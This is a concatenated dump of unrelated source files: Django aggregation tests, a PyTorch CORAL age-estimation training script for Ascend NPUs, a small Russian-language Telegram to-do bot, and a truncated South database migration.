"contact_id": 1,
"id": 1,
"isbn": "159059725",
"mean_age": 34.5,
"name": "The Definitive Guide to Django: Web Development Done Right",
"pages": 447,
"price": Approximate(Decimal("30")),
"pubdate": datetime.date(2007, 12, 6),
"publisher_id": 1,
"rating": 4.5,
}
]
)
books = Book.objects.filter(pk=1).annotate(mean_age=Avg('authors__age')).values('pk', 'isbn', 'mean_age')
self.assertEqual(
list(books), [
{
"pk": 1,
"isbn": "159059725",
"mean_age": 34.5,
}
]
)
books = Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values("name")
self.assertEqual(
list(books), [
{
"name": "The Definitive Guide to Django: Web Development Done Right"
}
]
)
books = Book.objects.filter(pk=1).values().annotate(mean_age=Avg('authors__age'))
self.assertEqual(
list(books), [
{
"contact_id": 1,
"id": 1,
"isbn": "159059725",
"mean_age": 34.5,
"name": "The Definitive Guide to Django: Web Development Done Right",
"pages": 447,
"price": Approximate(Decimal("30")),
"pubdate": datetime.date(2007, 12, 6),
"publisher_id": 1,
"rating": 4.5,
}
]
)
books = Book.objects.values("rating").annotate(n_authors=Count("authors__id"), mean_age=Avg("authors__age")).order_by("rating")
self.assertEqual(
list(books), [
{
"rating": 3.0,
"n_authors": 1,
"mean_age": 45.0,
},
{
"rating": 4.0,
"n_authors": 6,
"mean_age": Approximate(37.16, places=1)
},
{
"rating": 4.5,
"n_authors": 2,
"mean_age": 34.5,
},
{
"rating": 5.0,
"n_authors": 1,
"mean_age": 57.0,
}
]
)
authors = Author.objects.annotate(Avg("friends__age")).order_by("name")
self.assertEqual(len(authors), 9)
self.assertQuerysetEqual(
authors, [
('Adrian Holovaty', 32.0),
('Brad Dayley', None),
('Jacob Kaplan-Moss', 29.5),
('James Bennett', 34.0),
('Jeffrey Forcier', 27.0),
('Paul Bissex', 31.0),
('Peter Norvig', 46.0),
('Stuart Russell', 57.0),
('Wesley J. Chun', Approximate(33.66, places=1))
],
lambda a: (a.name, a.friends__age__avg)
)
def test_count(self):
vals = Book.objects.aggregate(Count("rating"))
self.assertEqual(vals, {"rating__count": 6})
vals = Book.objects.aggregate(Count("rating", distinct=True))
self.assertEqual(vals, {"rating__count": 4})
def test_fkey_aggregate(self):
explicit = list(Author.objects.annotate(Count('book__id')))
implicit = list(Author.objects.annotate(Count('book')))
self.assertEqual(explicit, implicit)
def test_annotate_ordering(self):
books = Book.objects.values('rating').annotate(oldest=Max('authors__age')).order_by('oldest', 'rating')
self.assertEqual(
list(books), [
{
"rating": 4.5,
"oldest": 35,
},
{
"rating": 3.0,
"oldest": 45
},
{
"rating": 4.0,
"oldest": 57,
},
{
"rating": 5.0,
"oldest": 57,
}
]
)
books = Book.objects.values("rating").annotate(oldest=Max("authors__age")).order_by("-oldest", "-rating")
self.assertEqual(
list(books), [
{
"rating": 5.0,
"oldest": 57,
},
{
"rating": 4.0,
"oldest": 57,
},
{
"rating": 3.0,
"oldest": 45,
},
{
"rating": 4.5,
"oldest": 35,
}
]
)
def test_aggregate_annotation(self):
vals = Book.objects.annotate(num_authors=Count("authors__id")).aggregate(Avg("num_authors"))
self.assertEqual(vals, {"num_authors__avg": Approximate(1.66, places=1)})
def test_filtering(self):
p = Publisher.objects.create(name='Expensive Publisher', num_awards=0)
Book.objects.create(
name='ExpensiveBook1',
pages=1,
isbn='111',
rating=3.5,
price=Decimal("1000"),
publisher=p,
contact_id=1,
pubdate=datetime.date(2008,12,1)
)
Book.objects.create(
name='ExpensiveBook2',
pages=1,
isbn='222',
rating=4.0,
price=Decimal("1000"),
publisher=p,
contact_id=1,
pubdate=datetime.date(2008,12,2)
)
Book.objects.create(
name='ExpensiveBook3',
pages=1,
isbn='333',
rating=4.5,
price=Decimal("35"),
publisher=p,
contact_id=1,
pubdate=datetime.date(2008,12,3)
)
publishers = Publisher.objects.annotate(num_books=Count("book__id")).filter(num_books__gt=1).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Prentice Hall",
"Expensive Publisher",
],
lambda p: p.name,
)
publishers = Publisher.objects.filter(book__price__lt=Decimal("40.0")).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Apress",
"Sams",
"Prentice Hall",
"Expensive Publisher",
],
lambda p: p.name
)
publishers = Publisher.objects.annotate(num_books=Count("book__id")).filter(num_books__gt=1, book__price__lt=Decimal("40.0")).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Prentice Hall",
"Expensive Publisher",
],
lambda p: p.name,
)
publishers = Publisher.objects.filter(book__price__lt=Decimal("40.0")).annotate(num_books=Count("book__id")).filter(num_books__gt=1).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
],
lambda p: p.name
)
publishers = Publisher.objects.annotate(num_books=Count("book")).filter(num_books__range=[1, 3]).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Sams",
"Prentice Hall",
"Morgan Kaufmann",
"Expensive Publisher",
],
lambda p: p.name
)
publishers = Publisher.objects.annotate(num_books=Count("book")).filter(num_books__range=[1, 2]).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Sams",
"Prentice Hall",
"Morgan Kaufmann",
],
lambda p: p.name
)
publishers = Publisher.objects.annotate(num_books=Count("book")).filter(num_books__in=[1, 3]).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Sams",
"Morgan Kaufmann",
"Expensive Publisher",
],
lambda p: p.name,
)
publishers = Publisher.objects.annotate(num_books=Count("book")).filter(num_books__isnull=True)
self.assertEqual(len(publishers), 0)
def test_annotation(self):
vals = Author.objects.filter(pk=1).aggregate(Count("friends__id"))
self.assertEqual(vals, {"friends__id__count": 2})
books = Book.objects.annotate(num_authors=Count("authors__name")).filter(num_authors__ge=2).order_by("pk")
self.assertQuerysetEqual(
books, [
"The Definitive Guide to Django: Web Development Done Right",
"Artificial Intelligence: A Modern Approach",
],
lambda b: b.name
)
authors = Author.objects.annotate(num_friends=Count("friends__id", distinct=True)).filter(num_friends=0).order_by("pk")
self.assertQuerysetEqual(
authors, [
"Brad Dayley",
],
lambda a: a.name
)
publishers = Publisher.objects.annotate(num_books=Count("book__id")).filter(num_books__gt=1).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Prentice Hall",
],
lambda p: p.name
)
publishers = Publisher.objects.filter(book__price__lt=Decimal("40.0")).annotate(num_books=Count("book__id")).filter(num_books__gt=1)
self.assertQuerysetEqual(
publishers, [
"Apress",
],
lambda p: p.name
)
books = Book.objects.annotate(num_authors=Count("authors__id")).filter(authors__name__contains="Norvig", num_authors__gt=1)
self.assertQuerysetEqual(
books, [
"Artificial Intelligence: A Modern Approach",
],
lambda b: b.name
)
def test_more_aggregation(self):
a = Author.objects.get(name__contains='Norvig')
b = Book.objects.get(name__contains='Done Right')
b.authors.add(a)
b.save()
vals = Book.objects.annotate(num_authors=Count("authors__id")).filter(authors__name__contains="Norvig", num_authors__gt=1).aggregate(Avg("rating"))
self.assertEqual(vals, {"rating__avg": 4.25})
def test_even_more_aggregate(self):
publishers = Publisher.objects.annotate(earliest_book=Min("book__pubdate")).exclude(earliest_book=None).order_by("earliest_book").values()
self.assertEqual(
list(publishers), [
{
'earliest_book': datetime.date(1991, 10, 15),
'num_awards': 9,
'id': 4,
'name': 'Morgan Kaufmann'
},
{
'earliest_book': datetime.date(1995, 1, 15),
'num_awards': 7,
'id': 3,
'name': 'Prentice Hall'
},
{
'earliest_book': datetime.date(2007, 12, 6),
'num_awards': 3,
'id': 1,
'name': 'Apress'
},
{
'earliest_book': datetime.date(2008, 3, 3),
'num_awards': 1,
'id': 2,
'name': 'Sams'
}
]
)
vals = Store.objects.aggregate(Max("friday_night_closing"), Min("original_opening"))
self.assertEqual(
vals,
{
"friday_night_closing__max": datetime.time(23, 59, 59),
"original_opening__min": datetime.datetime(1945, 4, 25, 16, 24, 14),
}
)
def test_annotate_values_list(self):
books = Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values_list("pk", "isbn", "mean_age")
self.assertEqual(
list(books), [
(1, "159059725", 34.5),
]
)
books = Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values_list("isbn")
self.assertEqual(
list(books), [
('159059725',)
]
)
books = Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values_list("mean_age")
self.assertEqual(
list(books), [
(34.5,)
]
)
books = Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values_list("mean_age", flat=True)
self.assertEqual(list(books), [34.5])
books = Book.objects.values_list("price").annotate(count=Count("price")).order_by("-count", "price")
self.assertEqual(
list(books), [
(Decimal("29.69"), 2),
(Decimal('23.09'), 1),
(Decimal('30'), 1),
(Decimal('75'), 1),
(Decimal('82.8'), 1),
]
)
| [
"henrique@bastos.net"
] | henrique@bastos.net |
40d60b41be552dcfd2df4f67bf167172d1075756 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/image_classification/coral-cnn_ID1064_for_PyTorch/model-code/cacd-coral.py | 45795ac09a7b420de8ae37d8e096ba753a70016d | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 16,909 | py | # coding: utf-8
#
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
#############################################
# Consistent Cumulative Logits with ResNet-34
#############################################
# Imports
import os
import time
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
import argparse
import sys
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
from torchvision import transforms
from PIL import Image
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
torch.backends.cudnn.deterministic = True
TRAIN_CSV_PATH = './cacd_train.csv'
VALID_CSV_PATH = './cacd_valid.csv'
TEST_CSV_PATH = './cacd_test.csv'
IMAGE_PATH = '/shared_datasets/CACD/centercropped/jpg'
# Argparse helper
parser = argparse.ArgumentParser()
parser.add_argument('--cuda',
type=int,
default=-1)
parser.add_argument('--seed',
type=int,
default=-1)
parser.add_argument('--numworkers',
type=int,
default=3)
parser.add_argument('--outpath',
type=str,
required=True)
parser.add_argument('--imp_weight',
type=int,
default=0)
args = parser.parse_args()
NUM_WORKERS = args.numworkers
if args.cuda >= 0:
DEVICE = torch.device(f'npu:{NPU_CALCULATE_DEVICE}')
else:
DEVICE = torch.device(f'npu:{NPU_CALCULATE_DEVICE}')
if args.seed == -1:
RANDOM_SEED = None
else:
RANDOM_SEED = args.seed
IMP_WEIGHT = args.imp_weight
PATH = args.outpath
if not os.path.exists(PATH):
os.mkdir(PATH)
LOGFILE = os.path.join(PATH, 'training.log')
TEST_PREDICTIONS = os.path.join(PATH, 'test_predictions.log')
TEST_ALLPROBAS = os.path.join(PATH, 'test_allprobas.tensor')
# Logging
header = []
header.append('PyTorch Version: %s' % torch.__version__)
header.append('CUDA device available: %s' % torch.npu.is_available())
header.append('Using CUDA device: %s' % DEVICE)
header.append('Random Seed: %s' % RANDOM_SEED)
header.append('Task Importance Weight: %s' % IMP_WEIGHT)
header.append('Output Path: %s' % PATH)
header.append('Script: %s' % sys.argv[0])
with open(LOGFILE, 'w') as f:
for entry in header:
print(entry)
f.write('%s\n' % entry)
f.flush()
##########################
# SETTINGS
##########################
# Hyperparameters
learning_rate = 0.0005
num_epochs = 200
# Architecture
NUM_CLASSES = 49
BATCH_SIZE = 256
GRAYSCALE = False
df = pd.read_csv(TRAIN_CSV_PATH, index_col=0)
ages = df['age'].values
del df
ages = torch.tensor(ages, dtype=torch.float)
def task_importance_weights(label_array):
uniq = torch.unique(label_array)
num_examples = label_array.size(0)
m = torch.zeros(uniq.shape[0])
for i, t in enumerate(torch.arange(torch.min(uniq), torch.max(uniq))):
m_k = torch.max(torch.tensor([label_array[label_array > t].size(0),
num_examples - label_array[label_array > t].size(0)]))
m[i] = torch.sqrt(m_k.float())
imp = m/torch.max(m)
return imp
# Data-specific scheme
if not IMP_WEIGHT:
imp = torch.ones(NUM_CLASSES-1, dtype=torch.float)
elif IMP_WEIGHT == 1:
imp = task_importance_weights(ages)
imp = imp[0:NUM_CLASSES-1]
else:
raise ValueError('Incorrect importance weight parameter.')
imp = imp.to(f'npu:{NPU_CALCULATE_DEVICE}')
###################
# Dataset
###################
class CACDDataset(Dataset):
"""Custom Dataset for loading CACD face images"""
def __init__(self,
csv_path, img_dir, transform=None):
df = pd.read_csv(csv_path, index_col=0)
self.img_dir = img_dir
self.csv_path = csv_path
self.img_names = df['file'].values
self.y = df['age'].values
self.transform = transform
def __getitem__(self, index):
img = Image.open(os.path.join(self.img_dir,
self.img_names[index]))
if self.transform is not None:
img = self.transform(img)
label = self.y[index]
levels = [1]*label + [0]*(NUM_CLASSES - 1 - label)
levels = torch.tensor(levels, dtype=torch.float32)
return img, label, levels
def __len__(self):
return self.y.shape[0]
custom_transform = transforms.Compose([transforms.Resize((128, 128)),
transforms.RandomCrop((120, 120)),
transforms.ToTensor()])
train_dataset = CACDDataset(csv_path=TRAIN_CSV_PATH,
img_dir=IMAGE_PATH,
transform=custom_transform)
custom_transform2 = transforms.Compose([transforms.Resize((128, 128)),
transforms.CenterCrop((120, 120)),
transforms.ToTensor()])
test_dataset = CACDDataset(csv_path=TEST_CSV_PATH,
img_dir=IMAGE_PATH,
transform=custom_transform2)
valid_dataset = CACDDataset(csv_path=VALID_CSV_PATH,
img_dir=IMAGE_PATH,
transform=custom_transform2)
train_loader = DataLoader(dataset=train_dataset,
batch_size=BATCH_SIZE,
shuffle=True,
num_workers=NUM_WORKERS)
valid_loader = DataLoader(dataset=valid_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS)
test_loader = DataLoader(dataset=test_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS)
##########################
# MODEL
##########################
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes, grayscale):
self.num_classes = num_classes
self.inplanes = 64
if grayscale:
in_dim = 1
else:
in_dim = 3
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(in_dim, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AvgPool2d(4)
self.fc = nn.Linear(512, 1, bias=False)
self.linear_1_bias = nn.Parameter(torch.zeros(self.num_classes-1).float())
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, (2. / n)**.5)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
logits = self.fc(x)
logits = logits + self.linear_1_bias
probas = torch.sigmoid(logits)
return logits, probas
def resnet34(num_classes, grayscale):
"""Constructs a ResNet-34 model."""
model = ResNet(block=BasicBlock,
layers=[3, 4, 6, 3],
num_classes=num_classes,
grayscale=grayscale)
return model
###########################################
# Initialize Cost, Model, and Optimizer
###########################################
def cost_fn(logits, levels, imp):
val = (-torch.sum((F.logsigmoid(logits)*levels
+ (F.logsigmoid(logits) - logits)*(1-levels))*imp,
dim=1))
return torch.mean(val)
torch.manual_seed(RANDOM_SEED)
torch.npu.manual_seed(RANDOM_SEED)
model = resnet34(NUM_CLASSES, GRAYSCALE)
model.to(f'npu:{NPU_CALCULATE_DEVICE}')
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
def compute_mae_and_mse(model, data_loader, device):
mae, mse, num_examples = 0, 0, 0
for i, (features, targets, levels) in enumerate(data_loader):
features = features.to(f'npu:{NPU_CALCULATE_DEVICE}')
targets = targets.to(f'npu:{NPU_CALCULATE_DEVICE}')
logits, probas = model(features)
predict_levels = probas > 0.5
predicted_labels = torch.sum(predict_levels, dim=1)
num_examples += targets.size(0)
mae += torch.sum(torch.abs(predicted_labels - targets))
mse += torch.sum((predicted_labels - targets)**2)
mae = mae.float() / num_examples
mse = mse.float() / num_examples
return mae, mse
start_time = time.time()
best_mae, best_rmse, best_epoch = 999, 999, -1
for epoch in range(num_epochs):
model.train()
for batch_idx, (features, targets, levels) in enumerate(train_loader):
features = features.to(f'npu:{NPU_CALCULATE_DEVICE}')
targets = targets
targets = targets.to(f'npu:{NPU_CALCULATE_DEVICE}')
levels = levels.to(f'npu:{NPU_CALCULATE_DEVICE}')
# FORWARD AND BACK PROP
logits, probas = model(features)
cost = cost_fn(logits, levels, imp)
optimizer.zero_grad()
cost.backward()
# UPDATE MODEL PARAMETERS
optimizer.step()
# LOGGING
if not batch_idx % 50:
s = ('Epoch: %03d/%03d | Batch %04d/%04d | Cost: %.4f'
% (epoch+1, num_epochs, batch_idx,
len(train_dataset)//BATCH_SIZE, cost))
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
model.eval()
with torch.set_grad_enabled(False):
valid_mae, valid_mse = compute_mae_and_mse(model, valid_loader,
device=DEVICE)
if valid_mae < best_mae:
best_mae, best_rmse, best_epoch = valid_mae, torch.sqrt(valid_mse), epoch
########## SAVE MODEL #############
torch.save(model.state_dict(), os.path.join(PATH, 'best_model.pt'))
s = 'MAE/RMSE: | Current Valid: %.2f/%.2f Ep. %d | Best Valid : %.2f/%.2f Ep. %d' % (
valid_mae, torch.sqrt(valid_mse), epoch, best_mae, best_rmse, best_epoch)
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
s = 'Time elapsed: %.2f min' % ((time.time() - start_time)/60)
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
model.eval()
with torch.set_grad_enabled(False): # save memory during inference
train_mae, train_mse = compute_mae_and_mse(model, train_loader,
device=DEVICE)
valid_mae, valid_mse = compute_mae_and_mse(model, valid_loader,
device=DEVICE)
test_mae, test_mse = compute_mae_and_mse(model, test_loader,
device=DEVICE)
s = 'MAE/RMSE: | Train: %.2f/%.2f | Valid: %.2f/%.2f | Test: %.2f/%.2f' % (
train_mae, torch.sqrt(train_mse),
valid_mae, torch.sqrt(valid_mse),
test_mae, torch.sqrt(test_mse))
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
s = 'Total Training Time: %.2f min' % ((time.time() - start_time)/60)
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
########## EVALUATE BEST MODEL ######
model.load_state_dict(torch.load(os.path.join(PATH, 'best_model.pt')))
model.eval()
with torch.set_grad_enabled(False):
train_mae, train_mse = compute_mae_and_mse(model, train_loader,
device=DEVICE)
valid_mae, valid_mse = compute_mae_and_mse(model, valid_loader,
device=DEVICE)
test_mae, test_mse = compute_mae_and_mse(model, test_loader,
device=DEVICE)
s = 'MAE/RMSE: | Best Train: %.2f/%.2f | Best Valid: %.2f/%.2f | Best Test: %.2f/%.2f' % (
train_mae, torch.sqrt(train_mse),
valid_mae, torch.sqrt(valid_mse),
test_mae, torch.sqrt(test_mse))
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
########## SAVE PREDICTIONS ######
all_pred = []
all_probas = []
with torch.set_grad_enabled(False):
for batch_idx, (features, targets, levels) in enumerate(test_loader):
features = features.to(f'npu:{NPU_CALCULATE_DEVICE}')
logits, probas = model(features)
all_probas.append(probas)
predict_levels = probas > 0.5
predicted_labels = torch.sum(predict_levels, dim=1)
lst = [str(int(i)) for i in predicted_labels]
all_pred.extend(lst)
torch.save(torch.cat(all_probas).to(f'npu:{NPU_CALCULATE_DEVICE}'), TEST_ALLPROBAS)
with open(TEST_PREDICTIONS, 'w') as f:
all_pred = ','.join(all_pred)
f.write(all_pred)
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
5e83729a2a9084280b3a088b23a69aadbaf7714d | 41110aaf46c098bbe1906587d7e3bf057514355a | /handlers.py | 0b373b1afc01dc7e74178b327068c72d55bb43f3 | [] | no_license | yourboyfriendsdrug/Thursday-22-04-21 | 5a6fd3f2a369df85381534443e33b600295269b1 | ddea534227787447477df6d2d49f1f46092d4691 | refs/heads/master | 2023-04-25T14:48:28.609493 | 2021-05-06T16:19:34 | 2021-05-06T16:19:34 | 360,564,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,869 | py | from app import bot, dp
from aiogram.types import Message
from config import admin_id, todo, HELP
import time
command = 0
#0 - пользователь ничего не выбрал
#1 - ожидаем дату для добавления задачи
#2 - ожидаем задачу для добавления в словарь
#3 - ожидаем вариант отображения задач
userDate, userTask = 0, 0 #глобальные переменные
async def checkDate(date, message):
global command
try:
time.strpt.time(date, 'dd.mm.YYYY')
return True
except ValueError:
await message.answer(text="Неправильный формат даты")
command = 0
async def send_to_admin(dp):
await bot.send_message(chat_id=admin_id, text="Бот запущен")
@dp.message_handler(commands = "start")
async def start(message: Message):
await message.answer(text="Работает")
@dp.message_handler(commands = "add")
async def add(message: Message):
global command
await message.answer(text="Введите дату в формате дд.мм.гггг")
command = 1
@dp.message_handler(commands = "done")
async def done(message: Message):
await message.answer(text="Работает")
@dp.message_handler(commands = "help")
async def help(message: Message):
await message.answer(text="HELP")
@dp.message_handler(commands = "show")
async def show(message: Message):
global command
await message.answer(text="[ 0 ] - вывести все задачи\n[ 1 ] - вывести задачи по определенной дате")
command = 3
@dp.message_handler(commands = "start")
async def inputText(message: Message):
global userDate, userTask, command, todo
if command == 1:
#проверка корректности ввода
if checkDate(userDate, message) == False:
return #функция прекращается
#запрос - что нужно сделать
userDate = message.text #то, что ввел пользователь
await message.answer("Введите, что нужно сделать")
command = 2
elif command ==2:
userTask = message.text
if userDate in todo:
todo[userDate].append(userTask)
else:
todo[userDate]=[userTask]
await message.answer(f"Добавлена '{userTask}' на {userDate} ")
command = 0
elif command == 3:
if message.text == "0":
#сортируем ключи и проходимя по ним циклом
for date in sorted(todo.keys()):
#получаем список задач и выводим каждую задачу на новой строке
for task in todo [date]:
await message.answer(text = f"[{date} - '{task}']") | [
""
] | |
e7c0515ee7a896fe25357447cbf5bdfbacdeb236 | 99ca3abf85542ef90f9525fa73e359ef00b3f713 | /raven/migrations/0018_auto__del_field_feed_dead.py | a0ae9474cb55f66144c61be19cd045d6aaa049dd | [] | no_license | achiang/readraven | 408621fe7f6ba33078a089ae3d744c7db587db53 | 56aca6ce21b158e824a6bc62a4bdc867f6f75713 | refs/heads/master | 2020-12-25T12:08:09.479948 | 2013-08-11T21:35:17 | 2013-08-11T21:35:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,452 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Feed.dead'
db.delete_column(u'raven_feed', 'dead')
def backwards(self, orm):
# Adding field 'Feed.dead'
db.add_column(u'raven_feed', 'dead',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
models = {
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'raven.feed': {
'Meta': {'object_name': 'Feed'},
'description': ('django.db.models.fields.TextField', [], {}),
'fetch_frequency': ('django.db.models.fields.IntegerField', [], {'default': '30'}),
'generator': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_fetched': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'link': ('django.db.models.fields.TextField', [], {'unique': 'True'}),
'site': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'title': ('django.db.models.fields.TextField', [], {})
},
u'raven.feeditem': {
'Meta': {'unique_together': "(('feed', 'guid'),)", 'object_name': 'FeedItem', 'index_together': "[['feed', 'guid'], ['feed', 'link'], ['feed', 'title'], ['feed', 'atom_id'], ['feed', 'published']]"},
'atom_id': ('django.db.models.fields.TextField', [], {'default': "''", 'db_index': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': u"orm['raven.Feed']"}),
'guid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '1023'}),
'published': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'reader_guid': ('django.db.models.fields.CharField', [], {'max_length': '48', 'unique': 'True', 'null': 'True'}),
'title': ('django.db.models.fields.TextField', [], {})
},
u'raven.userfeed': {
'Meta': {'unique_together': "(('user', 'feed'),)", 'object_name': 'UserFeed', 'index_together': "[['user', 'feed']]"},
'feed': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'userfeeds'", 'to': u"orm['raven.Feed']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'userfeeds'", 'to': u"orm['usher.User']"})
},
u'raven.userfeeditem': {
'Meta': {'unique_together': "(('user', 'feed', 'item'),)", 'object_name': 'UserFeedItem', 'index_together': "[['user', 'feed', 'read', 'item']]"},
'feed': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'feeditems'", 'to': u"orm['raven.Feed']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
